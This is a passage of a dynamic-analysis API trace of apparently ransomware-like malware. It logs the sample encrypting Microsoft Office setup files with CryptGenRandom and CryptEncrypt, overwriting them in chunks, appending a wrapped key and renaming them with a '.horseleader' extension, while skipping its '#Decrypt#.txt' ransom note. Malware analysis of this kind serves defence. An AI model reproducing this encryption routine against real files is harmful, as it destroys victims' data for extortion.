files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.horseleader")) returned 1 [0244.506] GetProcessHeap () returned 0x780000 [0244.506] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.506] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf2b422b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OfficeMUISet.XML", cAlternateFileName="OFFICE~2.XML")) returned 1 [0244.507] lstrcmpiW (lpString1="OfficeMUISet.XML", lpString2="Windows") returned -1 [0244.507] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 113 [0244.507] StrStrIW (lpFirst="OfficeMUISet.XML", lpSrch=".horseleader") returned 0x0 [0244.507] lstrcmpW (lpString1="OfficeMUISet.XML", lpString2="#Decrypt#.txt") returned 1 [0244.507] lstrcmpW (lpString1="OfficeMUISet.XML", lpString2="_uninstalling_.png") returned 1 [0244.507] lstrlenW (lpString=".testttjffg") returned 11 [0244.507] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML", lpSrch=".testttjffg") returned 0x0 [0244.507] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.507] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 113 [0244.507] StrStrW (lpFirst="OfficeMUISet.XML", lpSrch=".txt") returned 0x0 [0244.507] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=819) returned 1 [0244.508] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x333, lpOverlapped=0x0) returned 1 [0244.510] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.510] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x333, lpOverlapped=0x0) returned 1 [0244.510] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.510] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.510] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.511] CloseHandle (hObject=0x15c) returned 1 [0244.511] GetProcessHeap () returned 0x780000 [0244.511] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.511] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.horseleader") returned 125 [0244.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.horseleader")) returned 1 [0244.511] GetProcessHeap () returned 0x780000 [0244.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.512] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OSETUPUI.DLL", cAlternateFileName="")) returned 1 [0244.512] lstrcmpiW (lpString1="OSETUPUI.DLL", lpString2="Windows") returned -1 [0244.512] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL") returned 109 [0244.512] StrStrIW (lpFirst="OSETUPUI.DLL", lpSrch=".horseleader") returned 0x0 [0244.512] lstrcmpW (lpString1="OSETUPUI.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.512] lstrcmpW (lpString1="OSETUPUI.DLL", lpString2="_uninstalling_.png") returned 1 [0244.512] lstrlenW (lpString=".testttjffg") returned 11 [0244.512] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL", lpSrch=".testttjffg") returned 0x0 [0244.512] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.512] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL") returned 109 [0244.513] StrStrW (lpFirst="OSETUPUI.DLL", lpSrch=".txt") returned 0x0 [0244.513] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=191872) returned 1 [0244.513] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.513] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.516] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.516] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.517] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x14ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.517] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.518] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.518] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.518] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x29d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.518] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.520] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.520] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.520] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.520] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.520] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.521] CloseHandle (hObject=0x15c) returned 1 [0244.521] GetProcessHeap () returned 0x780000 [0244.521] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.521] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL.horseleader") returned 121 [0244.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\osetupui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\osetupui.dll.horseleader")) returned 1 [0244.522] GetProcessHeap () returned 0x780000 [0244.522] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.522] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4804a00, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd4804a00, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x3d90, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="promointl.dll", cAlternateFileName="PROMOI~1.DLL")) returned 1 [0244.522] lstrcmpiW (lpString1="promointl.dll", lpString2="Windows") returned -1 [0244.522] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll") returned 110 [0244.522] StrStrIW (lpFirst="promointl.dll", lpSrch=".horseleader") returned 0x0 [0244.522] lstrcmpW (lpString1="promointl.dll", lpString2="#Decrypt#.txt") returned 1 [0244.522] lstrcmpW (lpString1="promointl.dll", lpString2="_uninstalling_.png") returned 1 [0244.522] lstrlenW (lpString=".testttjffg") returned 11 [0244.522] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll", lpSrch=".testttjffg") returned 0x0 [0244.522] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.522] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.522] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\promointl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.524] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll") returned 110 [0244.524] StrStrW (lpFirst="promointl.dll", lpSrch=".txt") returned 0x0 [0244.524] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=15760) returned 1 [0244.524] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x3d90, lpOverlapped=0x0) returned 1 [0244.527] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffc270, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.527] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x3d90, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x3d90, lpOverlapped=0x0) returned 1 [0244.527] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.527] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.528] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.528] CloseHandle (hObject=0x15c) returned 1 [0244.528] GetProcessHeap () returned 0x780000 [0244.528] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.528] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll.horseleader") returned 122 [0244.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\promointl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\promointl.dll.horseleader")) returned 1 [0244.529] GetProcessHeap () returned 0x780000 [0244.529] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.529] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0b6300, ftCreationTime.dwHighDateTime=0x1ca9107, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2d0b6300, ftLastWriteTime.dwHighDateTime=0x1ca9107, nFileSizeHigh=0x0, nFileSizeLow=0x9339, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="PSCONFIG.CHM", cAlternateFileName="")) returned 1 [0244.529] lstrcmpiW (lpString1="PSCONFIG.CHM", lpString2="Windows") returned -1 [0244.529] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 109 [0244.529] StrStrIW (lpFirst="PSCONFIG.CHM", lpSrch=".horseleader") returned 0x0 [0244.529] lstrcmpW (lpString1="PSCONFIG.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.529] lstrcmpW (lpString1="PSCONFIG.CHM", lpString2="_uninstalling_.png") returned 1 [0244.529] lstrlenW (lpString=".testttjffg") returned 11 [0244.529] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM", lpSrch=".testttjffg") returned 0x0 [0244.529] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.529] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.529] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.531] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 109 [0244.531] StrStrW (lpFirst="PSCONFIG.CHM", lpSrch=".txt") returned 0x0 [0244.531] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=37689) returned 1 [0244.531] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.536] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.536] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.536] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x4339, lpOverlapped=0x0) returned 1 [0244.537] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffbcc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.537] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x4339, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x4339, lpOverlapped=0x0) returned 1 [0244.537] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.537] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.537] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.538] CloseHandle (hObject=0x15c) returned 1 [0244.538] GetProcessHeap () returned 0x780000 [0244.538] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.538] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.horseleader") returned 121 [0244.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.horseleader")) returned 1 [0244.539] GetProcessHeap () returned 0x780000 [0244.539] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.539] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a8bce00, ftCreationTime.dwHighDateTime=0x1ca910f, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7a8bce00, ftLastWriteTime.dwHighDateTime=0x1ca910f, nFileSizeHigh=0x0, nFileSizeLow=0x6931, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="PSS10O.CHM", cAlternateFileName="")) returned 1 [0244.539] lstrcmpiW (lpString1="PSS10O.CHM", lpString2="Windows") returned -1 [0244.539] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 107 [0244.539] StrStrIW (lpFirst="PSS10O.CHM", lpSrch=".horseleader") returned 0x0 [0244.539] lstrcmpW (lpString1="PSS10O.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.539] lstrcmpW (lpString1="PSS10O.CHM", lpString2="_uninstalling_.png") returned 1 [0244.539] lstrlenW (lpString=".testttjffg") returned 11 [0244.539] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM", lpSrch=".testttjffg") returned 0x0 [0244.539] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.539] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.539] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.543] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 107 [0244.543] StrStrW (lpFirst="PSS10O.CHM", lpSrch=".txt") returned 0x0 [0244.543] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=26929) returned 1 [0244.543] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.547] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.547] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.548] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, 